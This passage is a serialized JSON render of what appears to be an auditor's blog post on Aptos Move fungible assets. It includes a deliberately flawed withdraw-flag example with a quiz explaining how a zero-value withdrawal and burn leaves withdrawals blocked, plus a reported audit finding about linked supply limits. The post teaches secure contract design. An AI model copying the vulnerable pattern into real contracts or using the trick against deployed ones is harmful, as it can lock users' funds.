,{"type":25,"tag":216,"props":70276,"children":70277},{"style":7375},[70278],{"type":31,"value":177},{"type":25,"tag":216,"props":70280,"children":70281},{"style":6964},[70282],{"type":31,"value":10582},{"type":25,"tag":216,"props":70284,"children":70285},{"style":6947},[70286],{"type":31,"value":65701},{"type":25,"tag":216,"props":70288,"children":70289},{"style":6953},[70290],{"type":31,"value":1472},{"type":25,"tag":216,"props":70292,"children":70293},{"style":7375},[70294],{"type":31,"value":65508},{"type":25,"tag":216,"props":70296,"children":70297},{"style":6964},[70298],{"type":31,"value":7026},{"type":25,"tag":216,"props":70300,"children":70301},{"style":6947},[70302],{"type":31,"value":69947},{"type":25,"tag":216,"props":70304,"children":70305},{"style":6953},[70306],{"type":31,"value":1472},{"type":25,"tag":216,"props":70308,"children":70309},{"style":6953},[70310],{"type":31,"value":11093},{"type":25,"tag":216,"props":70312,"children":70313},{"style":7375},[70314],{"type":31,"value":69393},{"type":25,"tag":216,"props":70316,"children":70317},{"style":6964},[70318],{"type":31,"value":18761},{"type":25,"tag":216,"props":70320,"children":70321},{"class":6922,"line":6769},[70322,70327,70331,70335],{"type":25,"tag":216,"props":70323,"children":70324},{"style":7047},[70325],{"type":31,"value":70326},"    assert_withdraw_flag",{"type":25,"tag":216,"props":70328,"children":70329},{"style":6964},[70330],{"type":31,"value":1850},{"type":25,"tag":216,"props":70332,"children":70333},{"style":6936},[70334],{"type":31,"value":230},{"type":25,"tag":216,"props":70336,"children":70337},{"style":6964},[70338],{"type":31,"value":7797},{"type":25,"tag":216,"props":70340,"children":70341},{"class":6922,"line":6778},[70342,70346,70350],{"type":25,"tag":216,"props":70343,"children":70344},{"style":6964},[70345],{"type":31,"value":66686},{"type":25,"tag":216,"props":70347,"children":70348},{"style":6953},[70349],{"type":31,"value":13547},{"type":25,"tag":216,"props":70351,"children":70352},{"style":6964},[70353],{"type":31,"value":15728},{"type":25,"tag":216,"props":70355,"children":70356},{"class":6922,"line":7005},[70357,70362,70366,70370],{"type":25,"tag":216,"props":70358,"children":70359},{"style":7047},[70360],{"type":31,"value":70361},"    set_withdraw_flag",{"type":25,"tag":216,"props":70363,"children":70364},{"style":6964},[70365],{"type":31,"value":1850},{"type":25,"tag":216,"props":70367,"children":70368},{"style":6936},[70369],{"type":31,"value":12127},{"type":25,"tag":216,"props":70371,"children":70372},{"style":6964},[70373],{"type":31,"value":7797},{"type":25,"tag":216,"props":70375,"children":70376},{"class":6922,"line":7110},[70377,70381,70385,70389,70393,70397,70401,70405,70409,70413],{"type":25,"tag":216,"props":70378,"children":70379},{"style":6964},[70380],{"type":31,"value":69929},{"type":25,"tag":216,"props":70382,"children":70383},{"style":6953},[70384],{"type":31,"value":7438},{"type":25,"tag":216,"props":70386,"children":70387},{"style":7047},[70388],{"type":31,"value":70117},{"type":25,"tag":216,"props":70390,"children":70391},{"style":6964},[70392],{"type":31,"value":1850},{"type":25,"tag":216,"props":70394,"children":70395},{"style":6947},[70396],{"type":31,"value":69947},{"type":25,"tag":216,"props":70398,"children":70399},{"style":6964},[70400],{"type":31,"value":7026},{"type":25,"tag":216,"props":70402,"children":70403},{"style":6947},[70404],{"type":31,"value":9892},{"type":25,"tag":216,"props":70406,"children":70407},{"style":6964},[70408],{"type":31,"value":7026},{"type":25,"tag":216,"props":70410,"children":70411},{"style":6947},[70412],{"type":31,"value":24266},{"type":25,"tag":216,"props":70414,"children":70415},{"style":6964},[70416],{"type":31,"value":7797},{"type":25,"tag":216,"props":70418,"children":70419},{"class":6922,"line":7216},[70420,70424,70428],{"type":25,"tag":216,"props":70421,"children":70422},{"style":6964},[70423],{"type":31,"value":66686},{"type":25,"tag":216,"props":70425,"children":70426},{"style":6953},[70427],{"type":31,"value":13547},{"type":25,"tag":216,"props":70429,"children":70430},{"style":6964},[70431],{"type":31,"value":15728},{"type":25,"tag":216,"props":70433,"children":70434},{"class":6922,"line":7244},[70435],{"type":25,"tag":216,"props":70436,"children":70437},{"style":6964},[70438],{"type":31,"value":7311},{"type":25,"tag":216,"props":70440,"children":70441},{"class":6922,"line":7257},[70442],{"type":25,"tag":216,"props":70443,"children":70444},{"emptyLinePlaceholder":16},[70445],{"type":31,"value":7642},{"type":25,"tag":216,"props":70447,"children":70448},{"class":6922,"line":7275},[70449,70453,70457,70461,70465,70469,70473,70477,70481,70485,70489,70493,70497,70501,70505,70509,70513,70517,70521,70525,70529,70533,70537,70541,70545,70549,70553,70557,70561],{"type":25,"tag":216,"props":70450,"children":70451},{"style":6947},[70452],{"type":31,"value":65643},{"type":25,"tag":216,"props":70454,"children":70455},{"style":6947},[70456],{"type":31,"value":10158},{"type":25,"tag":216,"props":70458,"children":70459},{"style":6947},[70460],{"type":31,"value":24231},{"type":25,"tag":216,"props":70462,"children":70463},{"style":6964},[70464],{"type":31,"value":9757},{"type":25,"tag":216,"props":70466,"children":70467},{"style":7375},[70468],{"type":31,"value":177},{"type":25,"tag":216,"props":70470,"children":70471},{"style":6953},[70472],{"type":31,"value":1472},{"type":25,"tag":216,"props":70474,"children":70475},{"style":6947},[70476],{"type":31,"value":9883},{"type":25,"tag":216,"props":70478,"children":70479},{"style":6964},[70480],{"type":31,"value":11562},{"type":25,"tag":216,"props":70482,"children":70483},{"style":6947},[70484],{"type":31,"value":9892},{"type":25,"tag":216,"props":70486,"children":70487},{"style":6953},[70488],{"type":31,"value":1472},{"type":25,"tag":216,"props":70490,"children":70491},{"style":7375},[70492],{"type":31,"value":65529},{"type":25,"tag":216,"props":70494,"children":70495},{"style":6964},[70496],{"type":31,"value":9757},{"type":25,"tag":216,"props":70498,"children":70499},{"style":7375},[70500],{"type":31,"value":177},{"type":25,"tag":216,"props":70502,"children":70503},{"style":6964},[70504],{"type":31,"value":10582},{"type":25,"tag":216,"props":70506,"children":70507},{"style":6947},[70508],{"type":31,"value":24266},{"type":25,"tag":216,"props":70510,"children":70511},{"style":6953},[70512],{"type":31,"value":1472},{"type":25,"tag":216,"props":70514,"children":70515},{"style":7375},[70516],{"type":31,"value":9811},{"type":25,"tag":216,"props":70518,"children":70519},{"style":6964},[70520],{"type":31,"value":7026},{"type":25,"tag":216,"props":70522,"children":70523},{"style":6947},[70524],{"type":31,"value":69947},{"type":25,"tag":216,"props":70526,"children":70527},{"style":6953},[70528],{"type":31,"value":1472},{"type":25,"tag":216,"props":70530,"children":70531},{"style":6953},[70532],{"type":31,"value":11093},{"type":25,"tag":216,"props":70534,"children":70535},{"style":7375},[70536],{"type":31,"value":69393},{"type":25,"tag":216,"props":70538,"children":70539},{"style":6964},[70540],{"type":31,"value":1888},{"type":25,"tag":216,"props":70542,"children":70543},{"style":6953},[70544],{"type":31,"value":1472},{"type":25,"tag":216,"props":70546,"children":70547},{"style":7375},[70548],{"type":31,"value":65508},{"type":25,"tag":216,"props":70550,"children":70551},{"style":6947},[70552],{"type":31,"value":11518},{"type":25,"tag":216,"props":70554,"children":70555},{"style":6964},[70556],{"type":31,"value":26978},{"type":25,"tag":216,"props":70558,"children":70559},{"style":6953},[70560],{"type":31,"value":13547},{"type":25,"tag":216,"props":70562,"children":70563},{"style":6964},[70564],{"type":31,"value":65734},{"type":25,"tag":216,"props":70566,"children":70567},{"class":6922,"line":7296},[70568,70572,70576,70580],{"type":25,"tag":216,"props":70569,"children":70570},{"style":7047},[70571],{"type":31,"value":70326},{"type":25,"tag":216,"props":70573,"children":70574},{"style":6964},[70575],{"type":31,"value":1850},{"type":25,"tag":216,"props":70577,"children":70578},{"style":6936},[70579],{"type":31,"value":12127},{"type":25,"tag":216,"props":70581,"children":70582},{"style":6964},[70583],{"type":31,"value":7797},{"type":25,"tag":216,"props":70585,"children":70586},{"class":6922,"line":7305},[70587,70591,70595],{"type":25,"tag":216,"props":70588,"children":70589},{"style":6964},[70590],{"type":31,"value":66686},{"type":25,"tag":216,"props":70592,"children":70593},{"style":6953},[70594],{"type":31,"value":13547},{"type":25,"tag":216,"props":70596,"children":70597},{"style":6964},[70598],{"type":31,"value":15728},{"type":25,"tag":216,"props":70600,"children":70601},{"class":6922,"line":7557},[70602,70606,70610,70614],{"type":25,"tag":216,"props":70603,"children":70604},{"style":7047},[70605],{"type":31,"value":70361},{"type":25,"tag":216,"props":70607,"children":70608},{"style":6964},[70609],{"type":31,"value":1850},{"type":25,"tag":216,"props":70611,"children":70612},{"style":6936},[70613],{"type":31,"value":230},{"type":25,"tag":216,"props":70615,"children":70616},{"style":6964},[70617],{"type":31,"value":7797},{"type":25,"tag":216,"props":70619,"children":70620},{"class":6922,"line":7574},[70621,70625,70629,70633,70637,70641,70645,70649,70653,70657],{"type":25,"tag":216,"props":70622,"children":70623},{"style":6964},[70624],{"type":31,"value":69929},{"type":25,"tag":216,"props":70626,"children":70627},{"style":6953},[70628],{"type":31,"value":7438},{"type":25,"tag":216,"props":70630,"children":70631},{"style":7047},[70632],{"type":31,"value":69938},{"type":25,"tag":216,"props":70634,"children":70635},{"style":6964},[70636],{"type":31,"value":1850},{"type":25,"tag":216,"props":70638,"children":70639},{"style":6947},[70640],{"type":31,"value":69947},{"type":25,"tag":216,"props":70642,"children":70643},{"style":6964},[70644],{"type":31,"value":7026},{"type":25,"tag":216,"props":70646,"children":70647},{"style":6947},[70648],{"type":31,"value":9892},{"type":25,"tag":216,"props":70650,"children":70651},{"style":6964},[70652],{"type":31,"value":7026},{"type":25,"tag":216,"props":70654,"children":70655},{"style":6947},[70656],{"type":31,"value":24266},{"type":25,"tag":216,"props":70658,"children":70659},{"style":6964},[70660],{"type":31,"value":7107},{"type":25,"tag":216,"props":70662,"children":70663},{"class":6922,"line":7591},[70664],{"type":25,"tag":216,"props":70665,"children":70666},{"style":6964},[70667],{"type":31,"value":7874},{"type":25,"tag":38,"props":70669,"children":70670},{},[70671],{"type":31,"value":70672},"At first glance, this code appears valid, but not to an astute reader.",{"type":25,"tag":70154,"props":70674,"children":70675},{},[70676,70681],{"type":25,"tag":38,"props":70677,"children":70678},{},[70679],{"type":31,"value":70680},"Can you spot the bug? Hint: We mentioned the root cause previously.",{"type":25,"tag":70185,"props":70682,"children":70683},{"v-slot:answer-0":7},[70684,70704],{"type":25,"tag":38,"props":70685,"children":70686},{},[70687,70689,70694,70696,70702],{"type":31,"value":70688},"The developer overlooked an important detail, which we already mentioned earlier: a fungible asset with a value of zero can also be burned! An attacker could exploit this by withdrawing 0 ",{"type":25,"tag":82,"props":70690,"children":70692},{"className":70691},[],[70693],{"type":31,"value":65479},{"type":31,"value":70695}," (since withdraw doesn’t verify if the value is greater than 0) and then burning it using ",{"type":25,"tag":82,"props":70697,"children":70699},{"className":70698},[],[70700],{"type":31,"value":70701},"fungible_asset::destroy_zero",{"type":31,"value":70703},". This would complete the transaction while keeping the \"blocked\" flag set, effectively preventing further withdrawals.",{"type":25,"tag":38,"props":70705,"children":70706},{},[70707],{"type":31,"value":70708},"It's important to understand all the features in the standard.",{"type":25,"tag":26,"props":70710,"children":70712},{"id":70711},"migrating-from-coins-to-fungible-assets",[70713],{"type":31,"value":70714},"Migrating from coins to fungible assets",{"type":25,"tag":38,"props":70716,"children":70717},{},[70718,70720,70725],{"type":31,"value":70719},"If a fungible asset is considered an upgrade to ",{"type":25,"tag":82,"props":70721,"children":70723},{"className":70722},[],[70724],{"type":31,"value":64934},{"type":31,"value":70726},", a transition mechanism becomes necessary. This is addressed through a conversion map, establishing a relationship between specific coin and fungible asset. This duality is not without its challenges.",{"type":25,"tag":70728,"props":70729,"children":70730},"note",{},[70731],{"type":25,"tag":38,"props":70732,"children":70733},{},[70734,70736,70741,70743,70748],{"type":31,"value":70735},"While the ",{"type":25,"tag":82,"props":70737,"children":70739},{"className":70738},[],[70740],{"type":31,"value":64934},{"type":31,"value":70742}," API recognizes and integrates with fungible assets, the fungible asset APIs do not have awareness of the linked ",{"type":25,"tag":82,"props":70744,"children":70746},{"className":70745},[],[70747],{"type":31,"value":64934},{"type":31,"value":179},{"type":25,"tag":38,"props":70750,"children":70751},{},[70752,70753,70759,70761,70766,70768,70773],{"type":31,"value":474},{"type":25,"tag":82,"props":70754,"children":70756},{"className":70755},[],[70757],{"type":31,"value":70758},"coin_to_fungible_asset",{"type":31,"value":70760}," converting function automatically generates a corresponding fungible asset for a ",{"type":25,"tag":82,"props":70762,"children":70764},{"className":70763},[],[70765],{"type":31,"value":64934},{"type":31,"value":70767}," if one does not already exist. Manual creation of a fungible asset and its linkage to a ",{"type":25,"tag":82,"props":70769,"children":70771},{"className":70770},[],[70772],{"type":31,"value":64934},{"type":31,"value":70774}," is not allowed.",{"type":25,"tag":206,"props":70776,"children":70778},{"className":6915,"code":70777,"language":6914,"meta":7,"style":7},"public fun coin_to_fungible_asset\u003CCoinType>(\n    coin: Coin\u003CCoinType>\n): FungibleAsset acquires CoinConversionMap, CoinInfo {\n    let metadata = ensure_paired_metadata\u003CCoinType>();\n    let amount = burn_internal(coin);\n    fungible_asset::mint_internal(metadata, amount)\n}\n",[70779],{"type":25,"tag":82,"props":70780,"children":70781},{"__ignoreMap":7},[70782,70810,70837,70873,70906,70939,70975],{"type":25,"tag":216,"props":70783,"children":70784},{"class":6922,"line":6923},[70785,70789,70793,70798,70802,70806],{"type":25,"tag":216,"props":70786,"children":70787},{"style":6947},[70788],{"type":31,"value":65643},{"type":25,"tag":216,"props":70790,"children":70791},{"style":6947},[70792],{"type":31,"value":10158},{"type":25,"tag":216,"props":70794,"children":70795},{"style":6947},[70796],{"type":31,"value":70797}," coin_to_fungible_asset",{"type":25,"tag":216,"props":70799,"children":70800},{"style":6964},[70801],{"type":31,"value":9757},{"type":25,"tag":216,"props":70803,"children":70804},{"style":7375},[70805],{"type":31,"value":10535},{"type":25,"tag":216,"props":70807,"children":70808},{"style":6964},[70809],{"type":31,"value":10540},{"type":25,"tag":216,"props":70811,"children":70812},{"class":6922,"line":6769},[70813,70817,70821,70825,70829,70833],{"type":25,"tag":216,"props":70814,"children":70815},{"style":6947},[70816],{"type":31,"value":65153},{"type":25,"tag":216,"props":70818,"children":70819},{"style":6953},[70820],{"type":31,"value":1472},{"type":25,"tag":216,"props":70822,"children":70823},{"style":7375},[70824],{"type":31,"value":9752},{"type":25,"tag":216,"props":70826,"children":70827},{"style":6964},[70828],{"type":31,"value":9757},{"type":25,"tag":216,"props":70830,"children":70831},{"style":7375},[70832],{"type":31,"value":10535},{"type":25,"tag":216,"props":70834,"children":70835},{"style":6964},[70836],{"type":31,"value":9943},{"type":25,"tag":216,"props":70838,"children":70839},{"class":6922,"line":6778},[70840,70844,70848,70852,70856,70861,70865,70869],{"type":25,"tag":216,"props":70841,"children":70842},{"style":6964},[70843],{"type":31,"value":1888},{"type":25,"tag":216,"props":70845,"children":70846},{"style":6953},[70847],{"type":31,"value":1472},{"type":25,"tag":216,"props":70849,"children":70850},{"style":7375},[70851],{"type":31,"value":65508},{"type":25,"tag":216,"props":70853,"children":70854},{"style":6947},[70855],{"type":31,"value":11518},{"type":25,"tag":216,"props":70857,"children":70858},{"style":7375},[70859],{"type":31,"value":70860}," CoinConversionMap",{"type":25,"tag":216,"props":70862,"children":70863},{"style":6964},[70864],{"type":31,"value":7026},{"type":25,"tag":216,"props":70866,"children":70867},{"style":7375},[70868],{"type":31,"value":10665},{"type":25,"tag":216,"props":70870,"children":70871},{"style":6964},[70872],{"type":31,"value":7241},{"type":25,"tag":216,"props":70874,"children":70875},{"class":6922,"line":7005},[70876,70880,70885,70889,70894,70898,70902],{"type":25,"tag":216,"props":70877,"children":70878},{"style":6936},[70879],{"type":31,"value":6939},{"type":25,"tag":216,"props":70881,"children":70882},{"style":6947},[70883],{"type":31,"value":70884}," metadata",{"type":25,"tag":216,"props":70886,"children":70887},{"style":6953},[70888],{"type":31,"value":6956},{"type":25,"tag":216,"props":70890,"children":70891},{"style":6947},[70892],{"type":31,"value":70893}," ensure_paired_metadata",{"type":25,"tag":216,"props":70895,"children":70896},{"style":6964},[70897],{"type":31,"value":9757},{"type":25,"tag":216,"props":70899,"children":70900},{"style":7375},[70901],{"type":31,"value":10535},{"type":25,"tag":216,"props":70903,"children":70904},{"style":6964},[70905],{"type":31,"value":12404},{"type":25,"tag":216,"props":70907,"children":70908},{"class":6922,"line":7110},[70909,70913,70918,70922,70927,70931,70935],{"type":25,"tag":216,"props":70910,"children":70911},{"style":6936},[70912],{"type":31,"value":6939},{"type":25,"tag":216,"props":70914,"children":70915},{"style":6947},[70916],{"type":31,"value":70917}," amount",{"type":25,"tag":216,"props":70919,"children":70920},{"style":6953},[70921],{"type":31,"value":6956},{"type":25,"tag":216,"props":70923,"children":70924},{"style":7047},[70925],{"type":31,"value":70926}," burn_internal",{"type":25,"tag":216,"props":70928,"children":70929},{"style":6964},[70930],{"type":31,"value":1850},{"type":25,"tag":216,"props":70932,"children":70933},{"style":6947},[70934],{"type":31,"value":64901},{"type":25,"tag":216,"props":70936,"children":70937},{"style":6964},[70938],{"type":31,"value":7797},{"type":25,"tag":216,"props":70940,"children":70941},{"class":6922,"line":7216},[70942,70946,70950,70955,70959,70963,70967,70971],{"type":25,"tag":216,"props":70943,"children":70944},{"style":6964},[70945],{"type":31,"value":69929},{"type":25,"tag":216,"props":70947,"children":70948},{"style":6953},[70949],{"type":31,"value":7438},{"type":25,"tag":216,"props":70951,"children":70952},{"style":7047},[70953],{"type":31,"value":70954},"mint_internal",{"type":25,"tag":216,"props":70956,"children":70957},{"style":6964},[70958],{"type":31,"value":1850},{"type":25,"tag":216,"props":70960,"children":70961},{"style":6947},[70962],{"type":31,"value":66280},{"type":25,"tag":216,"props":70964,"children":70965},{"style":6964},[70966],{"type":31,"value":7026},{"type":25,"tag":216,"props":70968,"children":70969},{"style":6947},[70970],{"type":31,"value":24266},{"type":25,"tag":216,"props":70972,"children":70973},{"style":6964},[70974],{"type":31,"value":7107},{"type":25,"tag":216,"props":70976,"children":70977},{"class":6922,"line":7244},[70978],{"type":25,"tag":216,"props":70979,"children":70980},{"style":6964},[70981],{"type":31,"value":7874},{"type":25,"tag":38,"props":70983,"children":70984},{},[70985,70987,70994],{"type":31,"value":70986},"When creating a fungible asset, several pieces of information are required, such as the asset’s name, symbol, or maximum supply. During our audit of the fungible asset standard, we ",{"type":25,"tag":162,"props":70988,"children":70991},{"href":70989,"rel":70990},"https://github.com/aptos-labs/aptos-core/commit/e5f4b62b237dad4d15069d3bb0b551b2df04bf08",[166],[70992],{"type":31,"value":70993},"noticed an overlooked detail",{"type":31,"value":70995}," in the linking process.",{"type":25,"tag":206,"props":70997,"children":70999},{"className":6915,"code":70998,"language":6914,"meta":7,"style":7},"[...]\nprimary_fungible_store::create_primary_store_enabled_fungible_asset(\n    &metadata_object_cref,\n    option::map(coin_supply\u003CCoinType>(), |_| MAX_U128),\n    name\u003CCoinType>(),\n    symbol\u003CCoinType>(),\n    decimals\u003CCoinType>(),\n    string::utf8(b\"\"),\n    string::utf8(b\"\"),\n);\n[...]\n",[71000],{"type":25,"tag":82,"props":71001,"children":71002},{"__ignoreMap":7},[71003,71018,71038,71055,71111,71132,71152,71172,71202,71229,71236],{"type":25,"tag":216,"props":71004,"children":71005},{"class":6922,"line":6923},[71006,71010,71014],{"type":25,"tag":216,"props":71007,"children":71008},{"style":6964},[71009],{"type":31,"value":7701},{"type":25,"tag":216,"props":71011,"children":71012},{"style":6953},[71013],{"type":31,"value":13547},{"type":25,"tag":216,"props":71015,"children":71016},{"style":6964},[71017],{"type":31,"value":15728},{"type":25,"tag":216,"props":71019,"children":71020},{"class":6922,"line":6769},[71021,71025,71029,71034],{"type":25,"tag":216,"props":71022,"children":71023},{"style":6964},[71024],{"type":31,"value":66577},{"type":25,"tag":216,"props":71026,"children":71027},{"style":6953},[71028],{"type":31,"value":7438},{"type":25,"tag":216,"props":71030,"children":71031},{"style":7047},[71032],{"type":31,"value":71033},"create_primary_store_enabled_fungible_asset",{"type":25,"tag":216,"props":71035,"children":71036},{"style":6964},[71037],{"type":31,"value":7420},{"type":25,"tag":216,"props":71039,"children":71040},{"class":6922,"line":6778},[71041,71046,71051],{"type":25,"tag":216,"props":71042,"children":71043},{"style":6953},[71044],{"type":31,"value":71045},"    &",{"type":25,"tag":216,"props":71047,"children":71048},{"style":6947},[71049],{"type":31,"value":71050},"metadata_object_cref",{"type":25,"tag":216,"props":71052,"children":71053},{"style":6964},[71054],{"type":31,"value":7465},{"type":25,"tag":216,"props":71056,"children":71057},{"class":6922,"line":7005},[71058,71063,71067,71072,71076,71081,71085,71089,71094,71098,71102,71106],{"type":25,"tag":216,"props":71059,"children":71060},{"style":6964},[71061],{"type":31,"value":71062},"    option",{"type":25,"tag":216,"props":71064,"children":71065},{"style":6953},[71066],{"type":31,"value":7438},{"type":25,"tag":216,"props":71068,"children":71069},{"style":7047},[71070],{"type":31,"value":71071},"map",{"type":25,"tag":216,"props":71073,"children":71074},{"style":6964},[71075],{"type":31,"value":1850},{"type":25,"tag":216,"props":71077,"children":71078},{"style":6947},[71079],{"type":31,"value":71080},"coin_supply",{"type":25,"tag":216,"props":71082,"children":71083},{"style":6964},[71084],{"type":31,"value":9757},{"type":25,"tag":216,"props":71086,"children":71087},{"style":7375},[71088],{"type":31,"value":10535},{"type":25,"tag":216,"props":71090,"children":71091},{"style":6964},[71092],{"type":31,"value":71093},">(), ",{"type":25,"tag":216,"props":71095,"children":71096},{"style":6953},[71097],{"type":31,"value":14373},{"type":25,"tag":216,"props":71099,"children":71100},{"style":6947},[71101],{"type":31,"value":7031},{"type":25,"tag":216,"props":71103,"children":71104},{"style":6953},[71105],{"type":31,"value":14373},{"type":25,"tag":216,"props":71107,"children":71108},{"style":6964},[71109],{"type":31,"value":71110}," MAX_U128),\n",{"type":25,"tag":216,"props":71112,"children":71113},{"class":6922,"line":7110},[71114,71119,71123,71127],{"type":25,"tag":216,"props":71115,"children":71116},{"style":6947},[71117],{"type":31,"value":71118},"    name",{"type":25,"tag":216,"props":71120,"children":71121},{"style":6964},[71122],{"type":31,"value":9757},{"type":25,"tag":216,"props":71124,"children":71125},{"style":7375},[71126],{"type":31,"value":10535},{"type":25,"tag":216,"props":71128,"children":71129},{"style":6964},[71130],{"type":31,"value":71131},">(),\n",{"type":25,"tag":216,"props":71133,"children":71134},{"class":6922,"line":7216},[71135,71140,71144,71148],{"type":25,"tag":216,"props":71136,"children":71137},{"style":6947},[71138],{"type":31,"value":71139},"    symbol",{"type":25,"tag":216,"props":71141,"children":71142},{"style":6964},[71143],{"type":31,"value":9757},{"type":25,"tag":216,"props":71145,"children":71146},{"style":7375},[71147],{"type":31,"value":10535},{"type":25,"tag":216,"props":71149,"children":71150},{"style":6964},[71151],{"type":31,"value":71131},{"type":25,"tag":216,"props":71153,"children":71154},{"class":6922,"line":7244},[71155,71160,71164,71168],{"type":25,"tag":216,"props":71156,"children":71157},{"style":6947},[71158],{"type":31,"value":71159},"    decimals",{"type":25,"tag":216,"props":71161,"children":71162},{"style":6964},[71163],{"type":31,"value":9757},{"type":25,"tag":216,"props":71165,"children":71166},{"style":7375},[71167],{"type":31,"value":10535},{"type":25,"tag":216,"props":71169,"children":71170},{"style":6964},[71171],{"type":31,"value":71131},{"type":25,"tag":216,"props":71173,"children":71174},{"class":6922,"line":7257},[71175,71180,71184,71189,71193,71198],{"type":25,"tag":216,"props":71176,"children":71177},{"style":6964},[71178],{"type":31,"value":71179},"    string",{"type":25,"tag":216,"props":71181,"children":71182},{"style":6953},[71183],{"type":31,"value":7438},{"type":25,"tag":216,"props":71185,"children":71186},{"style":7047},[71187],{"type":31,"value":71188},"utf8",{"type":25,"tag":216,"props":71190,"children":71191},{"style":6964},[71192],{"type":31,"value":1850},{"type":25,"tag":216,"props":71194,"children":71195},{"style":8205},[71196],{"type":31,"value":71197},"b\"\"",{"type":25,"tag":216,"props":71199,"children":71200},{"style":6964},[71201],{"type":31,"value":10688},{"type":25,"tag":216,"props":71203,"children":71204},{"class":6922,"line":7275},[71205,71209,71213,71217,71221,71225],{"type":25,"tag":216,"props":71206,"children":71207},{"style":6964},[71208],{"type":31,"value":71179},{"type":25,"tag":216,"props":71210,"children":71211},{"style":6953},[71212],{"type":31,"value":7438},{"type":25,"tag":216,"props":71214,"children":71215},{"style":7047},[71216],{"type":31,"value":71188},{"type":25,"tag":216,"props":71218,"children":71219},{"style":6964},[71220],{"type":31,"value":1850},{"type":25,"tag":216,"props":71222,"children":71223},{"style":8205},[71224],{"type":31,"value":71197},{"type":25,"tag":216,"props":71226,"children":71227},{"style":6964},[71228],{"type":31,"value":10688},{"type":25,"tag":216,"props":71230,"children":71231},{"class":6922,"line":7296},[71232],{"type":25,"tag":216,"props":71233,"children":71234},{"style":6964},[71235],{"type":31,"value":7797},{"type":25,"tag":216,"props":71237,"children":71238},{"class":6922,"line":7305},[71239,71243,71247],{"type":25,"tag":216,"props":71240,"children":71241},{"style":6964},[71242],{"type":31,"value":7701},{"type":25,"tag":216,"props":71244,"children":71245},{"style":6953},[71246],{"type":31,"value":13547},{"type":25,"tag":216,"props":71248,"children":71249},{"style":6964},[71250],{"type":31,"value":15728},{"type":25,"tag":38,"props":71252,"children":71253},{},[71254,71256,71261],{"type":31,"value":71255},"When the linked fungible asset was created, the current ",{"type":25,"tag":82,"props":71257,"children":71259},{"className":71258},[],[71260],{"type":31,"value":64934},{"type":31,"value":71262}," supply was incorrectly passed as the maximum fungible asset supply, preventing the minting of additional fungible assets beyond the existing coin circulation.",{"type":25,"tag":38,"props":71264,"children":71265},{},[71266,71268,71273,71275,71281,71283,71288],{"type":31,"value":71267},"Users can manually migrate their ",{"type":25,"tag":82,"props":71269,"children":71271},{"className":71270},[],[71272],{"type":31,"value":65096},{"type":31,"value":71274}," to a primary fungible store. This creates a store for the paired fungible asset (if one doesn’t exist) and removes the ",{"type":25,"tag":82,"props":71276,"children":71278},{"className":71277},[],[71279],{"type":31,"value":71280},"\u003CCoinStore\u003CCoinType>>",{"type":31,"value":71282}," from the caller. All coins in the ",{"type":25,"tag":82,"props":71284,"children":71286},{"className":71285},[],[71287],{"type":31,"value":65096},{"type":31,"value":71289}," are exchanged and transferred to the new store during the migration.",{"type":25,"tag":206,"props":71291,"children":71293},{"className":6915,"code":71292,"language":6914,"meta":7,"style":7},"/// Voluntarily migrate to fungible store for `CoinType` if not yet.\npublic entry fun migrate_to_fungible_store\u003CCoinType>(\n    account: &signer\n) acquires CoinStore, CoinConversionMap, CoinInfo {\n    maybe_convert_to_fungible_store\u003CCoinType>(signer::address_of(account));\n}\n",[71294],{"type":25,"tag":82,"props":71295,"children":71296},{"__ignoreMap":7},[71297,71305,71337,71357,71393,71434],{"type":25,"tag":216,"props":71298,"children":71299},{"class":6922,"line":6923},[71300],{"type":25,"tag":216,"props":71301,"children":71302},{"style":6927},[71303],{"type":31,"value":71304},"/// Voluntarily migrate to fungible store for `CoinType` if not yet.\n",{"type":25,"tag":216,"props":71306,"children":71307},{"class":6922,"line":6769},[71308,71312,71316,71320,71325,71329,71333],{"type":25,"tag":216,"props":71309,"children":71310},{"style":6947},[71311],{"type":31,"value":65643},{"type":25,"tag":216,"props":71313,"children":71314},{"style":6947},[71315],{"type":31,"value":66610},{"type":25,"tag":216,"props":71317,"children":71318},{"style":6947},[71319],{"type":31,"value":10158},{"type":25,"tag":216,"props":71321,"children":71322},{"style":6947},[71323],{"type":31,"value":71324}," migrate_to_fungible_store",{"type":25,"tag":216,"props":71326,"children":71327},{"style":6964},[71328],{"type":31,"value":9757},{"type":25,"tag":216,"props":71330,"children":71331},{"style":7375},[71332],{"type":31,"value":10535},{"type":25,"tag":216,"props":71334,"children":71335},{"style":6964},[71336],{"type":31,"value":10540},{"type":25,"tag":216,"props":71338,"children":71339},{"class":6922,"line":6778},[71340,71344,71348,71352],{"type":25,"tag":216,"props":71341,"children":71342},{"style":6947},[71343],{"type":31,"value":29129},{"type":25,"tag":216,"props":71345,"children":71346},{"style":6953},[71347],{"type":31,"value":1472},{"type":25,"tag":216,"props":71349,"children":71350},{"style":6953},[71351],{"type":31,"value":11093},{"type":25,"tag":216,"props":71353,"children":71354},{"style":6947},[71355],{"type":31,"value":71356},"signer\n",{"type":25,"tag":216,"props":71358,"children":71359},{"class":6922,"line":7005},[71360,71364,71368,71372,71376,71381,71385,71389],{"type":25,"tag":216,"props":71361,"children":71362},{"style":6964},[71363],{"type":31,"value":7036},{"type":25,"tag":216,"props":71365,"children":71366},{"style":6947},[71367],{"type":31,"value":10295},{"type":25,"tag":216,"props":71369,"children":71370},{"style":7375},[71371],{"type":31,"value":65117},{"type":25,"tag":216,"props":71373,"children":71374},{"style":6964},[71375],{"type":31,"value":7026},{"type":25,"tag":216,"props":71377,"children":71378},{"style":7375},[71379],{"type":31,"value":71380},"CoinConversionMap",{"type":25,"tag":216,"props":71382,"children":71383},{"style":6964},[71384],{"type":31,"value":7026},{"type":25,"tag":216,"props":71386,"children":71387},{"style":7375},[71388],{"type":31,"value":10665},{"type":25,"tag":216,"props":71390,"children":71391},{"style":6964},[71392],{"type":31,"value":7241},{"type":25,"tag":216,"props":71394,"children":71395},{"class":6922,"line":7110},[71396,71401,71405,71409,71414,71418,71422,71426,71430],{"type":25,"tag":216,"props":71397,"children":71398},{"style":6947},[71399],{"type":31,"value":71400},"    